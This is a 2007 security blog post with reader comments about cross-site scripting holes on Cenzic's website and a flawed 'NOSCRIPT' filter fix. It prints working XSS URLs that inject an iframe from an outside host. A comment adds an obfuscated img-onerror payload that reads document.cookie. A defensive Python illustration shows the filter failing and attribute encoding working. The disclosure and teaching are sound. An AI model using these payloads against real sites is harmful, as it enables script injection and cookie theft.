NOSCRIPT on Cenzic
Erwin Geirnaert sent me an amusing email today about one of the links that Ronald threw up. Yes, Cenzic has had a number of XSS holes, and yes, they have tried to fix them, but they have had some problems in their fixes. Here’s Erwin’s email:
I followed this link from http://www.0x000000.com/?i=372:
http://www.cenzic.com/products_services/download_hailstorm.php?camp=%22%3E%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C
The HTML source:
<a href="/forms/hailstorm.php?id=3&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_hailstorm_starter.gif" alt="Hailstorm Starter: Try for 45 Days" width="455" height="39" border="0"></a><br>
<a href="/forms/hailstorm.php?id=2&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_try_hailstorm_7days.gif" alt="Hailstorm Core: Try for 7 Days" width="455" height="39" border="0"></a><br>
<a href="/forms/hailstorm.php?id=1&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_buy_hailstorm.gif" alt="Hailstorm Core: Buy Today" width="455" height="39" border="0"></a><br>
So a page with the name NOSCRIPTlet.html will work, no?
Erwin was absolutely right, aaaabsolutely right. Cenzic attempted to mitigate the risk by changing the word “script” to “NOSCRIPT”, which doesn’t do much in this case other than change the location where the vector lives. So I went ahead and created exactly that file (NOSCRIPTlet.html) to prove the point. You cannot do simple substitutions like that and assume they will break every vector. This all comes in reaction to some rather scary patents they issued that appear to break everyone else’s ability to work in the industry. Not good.
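As an added illustration of the point above (not code from the original post, and not Cenzic's code): the word-swap "fix" applied to the page's own camp value still produces a live iframe, while encoding the value for the attribute context it is rendered into does not. The link template, the parser-based check and the helper names are my own constructions.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the URL-decoded camp value from the vector in the post
VECTOR = '"><iframe src=http://ha.ckers.org/scriptlet.html <'

def naive_filter(value: str) -> str:
    """The substitution seen on the live page: rename 'script' to 'NOSCRIPT'.
    A blacklist word swap; the file on the remote host just gets renamed."""
    return value.replace("script", "NOSCRIPT")

def encode_attr(value: str) -> str:
    """Context-aware fix: HTML-encode the value for a quoted attribute,
    quote characters included, so it can never close the href."""
    return html.escape(value, quote=True)

def render_link(camp: str) -> str:
    """Hypothetical server-side template for the download button (assumed shape)."""
    return (f'<a href="/forms/hailstorm.php?id=3&amp;camp={camp}">'
            f'<img src="btn_hailstorm.gif" alt="Hailstorm Starter"></a>')

class TagCollector(HTMLParser):
    """Record every start tag a browser-like parser sees in the markup."""
    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup: str) -> list[str]:
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags

def is_safe(camp_filter) -> bool:
    """True only if the filtered vector yields exactly the intended <a><img> pair."""
    return tags_in(render_link(camp_filter(VECTOR))) == ["a", "img"]

if __name__ == "__main__":
    print(naive_filter(VECTOR))   # still an <iframe>, now pointing at NOSCRIPTlet.html
    print(is_safe(naive_filter))  # False
    print(is_safe(encode_attr))   # True
```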



June 28th, 2007 at 12:50 pm
Thanks RSnake, big props to you!
I didn’t even see this was the case btw, I was in a hurry when I posted it.
June 28th, 2007 at 2:21 pm
If you sell a product that finds xss, and your own site is vuln to xss, you deserve to have your hands and feet cut off for being a thief.
June 28th, 2007 at 9:17 pm
lmfao - It would seem Cenzic has been poaching the biggest, baddest and brightest that myspace has to offer.
June 29th, 2007 at 1:02 pm
While this is pretty hysterical, I get a sad gut-check when I think of the 50 + million dollars of investors’ money they are blowing on God Knows What….
…besides fueling some crazy marketing machine.
Seriously, this is disgusting. They are blowing millions of dollars making and selling pure crap to unsuspecting people, and they don’t even have a single employee who understands WEB APP SECURITY. I mean, read their blogs. XSS vs CSRF crap. Ridiculous. Stupid.
Why don’t more people in the industry speak up? Cenzic is hurting *everyone*, all of us included, each time they clown a client into paying them for a false impression of their security posture.
June 29th, 2007 at 2:10 pm
Contrary to what many people think, I’m no security scanner vendor. I work in the field and have my own sec. company, but we do pentesting by hand, and sometimes a few scripts only to automate stuff. So regarding Cenzic’s patents, they do not affect me. But I am sure that many companies are being hit by them in one way or another. My motto: if you are the best, you don’t have competition and you shouldn’t be afraid of it, let alone patent stuff, which is killing the industry instead of making it more transparent.
The XSS holes are just symbols, to show what is wrong with today’s understanding of web application security. I hope a few lessons can be learned; I had to learn ‘em also one way or the other.
June 29th, 2007 at 5:36 pm
Hello RSnake,
This is a nice trick, but as far as I understand, you load a page in another domain (in this case, ha.ckers.org) using an IFRAME.
That means that the script you load inside the IFRAME will not have access to the DOM of Cenzic’s website…
Did I miss anything?
Thanks,
Jacky
June 30th, 2007 at 9:11 am
cenzic boooooooooooooo!!#@#@
June 30th, 2007 at 12:49 pm
@Jacky - No you didn’t miss anything. That example vector indeed can only run JavaScript in another domain, but generally when there is one vector there are many more, so I wouldn’t say that site was safe based on that idea alone. It also makes SEO blackhat URL injection possible. Also, if done properly, that attack can easily be made into a convincing site using CSS (no JS required) to make people believe they are seeing something on Cenzic that is actually on another domain. Although not as bad, it’s still far from being a safe page.
June 30th, 2007 at 2:55 pm
http://www.cenzic.com/products_services/download_hailstorm.php?camp=%22%3E%3Cimg+src=404+onerror=eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,97,108,101,114,116,40,39,112,119,110,101,100,39,41))%3E%3Ctextarea%3E
June 30th, 2007 at 3:05 pm
ugh, it was stripped down by filters, ignore that,
http://beford.org/cenzic.html
July 2nd, 2007 at 2:59 pm
Bedford — nice…
July 12th, 2007 at 3:27 am
funny.
i have to make a decision between spi, hailstorm and watchfire. and hailstorm is out! very lame, they are very very arrogant but not able to code a secure application. that’s very lame.